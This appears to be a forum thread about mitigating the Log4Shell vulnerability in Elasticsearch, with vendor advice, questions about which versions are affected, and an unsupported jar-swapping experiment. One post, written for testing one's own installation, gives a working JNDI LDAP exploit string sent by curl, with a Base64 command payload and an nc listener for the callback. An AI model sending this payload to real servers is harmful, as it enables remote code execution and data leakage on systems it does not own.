Our advice is exactly as stated in the security announcement:
The simplest remediation is to set the JVM option -Dlog4j2.formatMsgNoLookups=true and restart each node of the cluster.
For Elasticsearch 5.6.11+, 6.4+, and 7.0+, this provides full protection against the RCE and information leak attacks.
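For reference, a minimal sketch of one way to apply that option, assuming a default archive (tarball) install where JVM flags are read from config/jvm.options; package installs keep these files under /etc/elasticsearch instead, and on 7.7+ you can also drop a file into config/jvm.options.d/:

    # append the flag to the JVM options read at startup
    # (path is an assumption for a default tarball install)
    echo "-Dlog4j2.formatMsgNoLookups=true" >> config/jvm.options
    # then restart the node so the new flag takes effect
    bin/elasticsearch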
Thank you, TimV.
I have read and understood the announcement.
Supported versions of Elasticsearch (6.8.9+, 7.8+) used with recent versions of the JDK (JDK9+) are not susceptible to either remote code execution or information leakage. This is due to Elasticsearch’s usage of the Java Security Manager. Most other versions (5.6.11+, 6.4.0+ and 7.0.0+) can be protected via a simple JVM property change.
On the other hand, the announcement also says:
Elasticsearch 6 and 7 are not susceptible to remote code execution with this vulnerability due to our use of the Java Security Manager.
In addition, Mr. DavidTurner said:
It doesn't say that 7.7 is affected, just that it's not a supported version (i.e. it's past EOL) so it's out of scope.
I don't understand why vulnerabilities only need to be addressed for supported versions.
What I would like to know is why there is a difference in the way v7.8 and v7.7 address this vulnerability.
Are there any technical differences between these versions with respect to this vulnerability?
About Elasticsearch 2, you wrote: "Elasticsearch 2 and earlier used a Log4j version that is not vulnerable to the newly discovered flaw. Please note that Elasticsearch 2 is not a supported version, and we always recommend updating to the latest release."
With 7.14.1 and the log4j2 2.16.0 jars in place, one option I tried today was to remove the x-pack-deprecation module and see whether ES is able to start up.
I found that it does start, but I'm not sure whether that is a viable solution to use. @sandeepkanabar, any comments on it?
I completely understand from your earlier reply that there might be a good reason for keeping the jar, but this is something we tried out; the rough steps are sketched below.
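For context, roughly what that experiment looked like on our end. This is unsupported (see the responses below), and the install path and exact bundled jar versions are assumptions for a default 7.14.1 tarball install:

    cd /path/to/elasticsearch-7.14.1          # hypothetical install dir
    # swap the bundled log4j jars for 2.16.0 (bundled versions vary by release)
    rm lib/log4j-api-2.11.1.jar lib/log4j-core-2.11.1.jar
    cp /tmp/log4j-api-2.16.0.jar /tmp/log4j-core-2.16.0.jar lib/
    # move the x-pack-deprecation module out of the way
    mv modules/x-pack-deprecation /tmp/x-pack-deprecation.bak
    # start the node and watch the logs for startup errors
    bin/elasticsearch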
@sandeepk-veritas - it's never a good idea to patch a 3rd-party application (ES here) with the latest log4j jar instead of the one it ships with. Let's say I'm using your product, but instead of what you recommend I add some other jar to it. You never know what it might break in prod. This is very risky to do in PROD unless you've tested all the scenarios.
Hey @orangejulius, I was able to get ES 5.3.0 to hit a local server emulating LDAP, though I haven't gotten to a stage yet where any data is leaked. Nonetheless, it shows that a call to an external server is very possible, at least with the parameters I'm using locally (see steps below). It's easy enough to re-create on other versions of ES, so I hope this is useful for others to test their installations.
1. Install Elasticsearch 5.3.0 (I'm using the official image via docker pull elasticsearch:5.3.0).
2. Modify log4j2.properties to catch more messages (e.g. rootLogger.level = debug).
3. Hit some endpoint that triggers the logger. In my case, a simple invalid URL with a URL-encoded exploit string was sufficient (note the private-ip field, which must be filled with whatever IP the LDAP server is running on): curl localhost:9200/%24%7Bjndi%3Aldap%3A%2F%2Fprivate-ip-here%3A1389%2FBasic%2FCommand%2FBase64%2FdG91Y2ggL3RtcC9wd25lZAo%3D%7D (URL-decoded, that path is ${jndi:ldap://private-ip-here:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}, where the Base64 decodes to touch /tmp/pwned).
4. Result: you'll see the LDAP server confirm that it received a network request (Received request from <IP of the ES node>); a minimal way to observe the callback without a full LDAP server is sketched below. There are likely other interesting results; I'll update this post if I find any.
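If you just want to confirm the outbound connection and don't have an LDAP emulator handy, a plain TCP listener is enough (netcat shown here as an assumption; flags vary between netcat variants, and any listener works). You won't get a protocol-level response, but you'll see the node connect and send its LDAP bind bytes:

    # on the machine whose IP you put in the exploit string
    nc -lv 1389
    # after sending the curl request above, nc reports the inbound
    # connection from the ES node, followed by binary LDAP bind data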
Interesting questions/next steps:
In which other versions does this happen?
Is there an API call that gets logged (and thus exploitable) at the default log level of info?
We do not recommend, nor support, directly modifying libraries within the Elasticsearch package. If you want to understand how to protect yourself from this issue, then please read and follow the official advisory.